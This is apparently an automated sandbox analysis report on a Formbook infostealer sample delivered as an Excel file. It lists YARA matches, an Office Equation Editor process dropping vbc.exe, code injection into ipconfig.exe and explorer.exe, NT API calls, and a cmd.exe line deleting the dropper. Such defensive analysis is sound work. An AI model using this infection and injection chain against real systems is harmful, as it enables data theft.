          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe
          Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181B0 NtCreateFile,5_2_004181B0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418260 NtReadFile,5_2_00418260
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182E0 NtClose,5_2_004182E0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,5_2_00418390
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182AC NtReadFile,5_2_004182AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041838B NtAllocateVirtualMemory,5_2_0041838B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,5_2_00730078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00730048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,5_2_007300C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,5_2_007307AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,5_2_0072F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,5_2_0072F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0072FAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0072FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0072FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0072FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0072FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0072FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0072FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,5_2_0072FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0072FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0072FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,5_2_0072FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730060 NtQuerySection,5_2_00730060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007310D0 NtOpenProcessToken,5_2_007310D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731148 NtOpenThread,5_2_00731148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073010C NtOpenDirectoryObject,5_2_0073010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007301D4 NtSetValueKey,5_2_007301D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F8CC NtWaitForSingleObject,5_2_0072F8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731930 NtSetContextThread,5_2_00731930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F938 NtWriteFile,5_2_0072F938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FA50 NtEnumerateValueKey,5_2_0072FA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FA20 NtQueryInformationFile,5_2_0072FA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAB8 NtQueryValueKey,5_2_0072FAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB50 NtCreateKey,5_2_0072FB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBE8 NtQueryVirtualMemory,5_2_0072FBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730C40 NtGetContextThread,5_2_00730C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC48 NtSetInformationFile,5_2_0072FC48
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC30 NtOpenProcess,5_2_0072FC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD5C NtEnumerateKey,5_2_0072FD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731D80 NtSuspendThread,5_2_00731D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FE24 NtWriteVirtualMemory,5_2_0072FE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FF34 NtQueueApcThread,5_2_0072FF34
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFFC NtCreateProcessEx,5_2_0072FFFC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B00C4 NtCreateFile,LdrInitializeThunk,7_2_022B00C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B07AC NtCreateMutant,LdrInitializeThunk,7_2_022B07AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_022AFAE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_022AFB68
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFB50 NtCreateKey,LdrInitializeThunk,7_2_022AFB50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_022AFBB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF900 NtReadFile,LdrInitializeThunk,7_2_022AF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF9F0 NtClose,LdrInitializeThunk,7_2_022AF9F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_022AFED0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFFB4 NtCreateSection,LdrInitializeThunk,7_2_022AFFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_022AFC60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFD8C NtDelayExecution,LdrInitializeThunk,7_2_022AFD8C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_022AFDC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0060 NtQuerySection,7_2_022B0060
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0078 NtResumeThread,7_2_022B0078
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0048 NtProtectVirtualMemory,7_2_022B0048
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B10D0 NtOpenProcessToken,7_2_022B10D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B010C NtOpenDirectoryObject,7_2_022B010C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B1148 NtOpenThread,7_2_022B1148
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B01D4 NtSetValueKey,7_2_022B01D4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFA20 NtQueryInformationFile,7_2_022AFA20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFA50 NtEnumerateValueKey,7_2_022AFA50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFAB8 NtQueryValueKey,7_2_022AFAB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFAD0 NtAllocateVirtualMemory,7_2_022AFAD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFBE8 NtQueryVirtualMemory,7_2_022AFBE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF8CC NtWaitForSingleObject,7_2_022AF8CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF938 NtWriteFile,7_2_022AF938
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B1930 NtSetContextThread,7_2_022B1930
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFE24 NtWriteVirtualMemory,7_2_022AFE24
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFEA0 NtReadVirtualMemory,7_2_022AFEA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFF34 NtQueueApcThread,7_2_022AFF34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFFFC NtCreateProcessEx,7_2_022AFFFC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC30 NtOpenProcess,7_2_022AFC30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC48 NtSetInformationFile,7_2_022AFC48
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0C40 NtGetContextThread,7_2_022B0C40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC90 NtUnmapViewOfSection,7_2_022AFC90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFD5C NtEnumerateKey,7_2_022AFD5C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B1D80 NtSuspendThread,7_2_022B1D80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981B0 NtCreateFile,7_2_000981B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098260 NtReadFile,7_2_00098260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982E0 NtClose,7_2_000982E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982AC NtReadFile,7_2_000982AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_008E632E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_008E67C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E6332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_008E6332
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E67C2 NtQueryInformationProcess,7_2_008E67C2
          Source: Letter 1019.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe 771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0232F970 appears 81 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 022BE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0230373B appears 238 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 022BDF5C appears 107 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02303F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007AF970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00783F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0078373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073DF5C appears 107 times
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: doc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/17@5/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Letter 1019.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFDAF.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Letter 1019.xlsxReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Letter 1019.xlsxStatic file information: File size 1297920 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: vbc.exe
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: Letter 1019.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Letter 1019.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: doc[1].exe.2.dr, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.1000000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.1000000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.vbc.exe.1000000.4.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
